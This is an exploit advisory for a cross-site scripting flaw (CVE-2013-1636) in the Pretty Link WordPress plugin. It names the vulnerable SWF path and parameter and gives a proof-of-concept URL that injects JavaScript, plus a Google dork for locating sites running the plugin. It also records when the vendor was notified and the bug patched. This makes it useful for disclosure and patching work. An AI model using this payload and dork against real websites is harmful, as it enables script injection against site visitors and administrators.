WordPress Pretty Link 1.6.3 Cross Site Scripting

`# Exploit Title: Wordpress pretty-link‏ plugin XSS in SWF  
# Release Date: 20/02/13  
# Author: hip [Insight-Labs]  
# Contact: [email protected] | Website: http://insight-labs.org  
# Software Link: http://downloads.wordpress.org/plugin/pretty-link.1.6.3.zip  
# Vendor Homepage: http://prettylinkpro.com/  
# Tested on: XPsp3  
# Affected version: 1.6.3 before  
# Google Dork: inurl:/wp-content/plugins/pretty-link/  
# REF:CVE-2013-1636  
-----------------------------------------------------------------------------------------------------------------------  
# Introduction:  
Pretty-link is Shrink, beautify, track, manage and share any URL on or off of your WordPress website. Create links that look how you want using your own domain name!  
-------------------------------------------------------------------------------------------------------------------------  
# XSS - Proof Of Concept:  
vulnerable path:  
/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf  
vulnerabile parameter:get-data  
  
POC:  
/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf?get-data=(function(){alert(xss)})()  
  
-------------------------------------------------------------------------------------------------------------------------  
# Patch:  
-- Vendor was notified on the 23/01/2013  
-- Vendor released version 1.6.3 on 25/01/2013 Fixed the bug  
-- REF:http://wordpress.org/extend/plugins/pretty-link/changelog/  
-------------------------------------------------------------------------------------------------------------------------  
`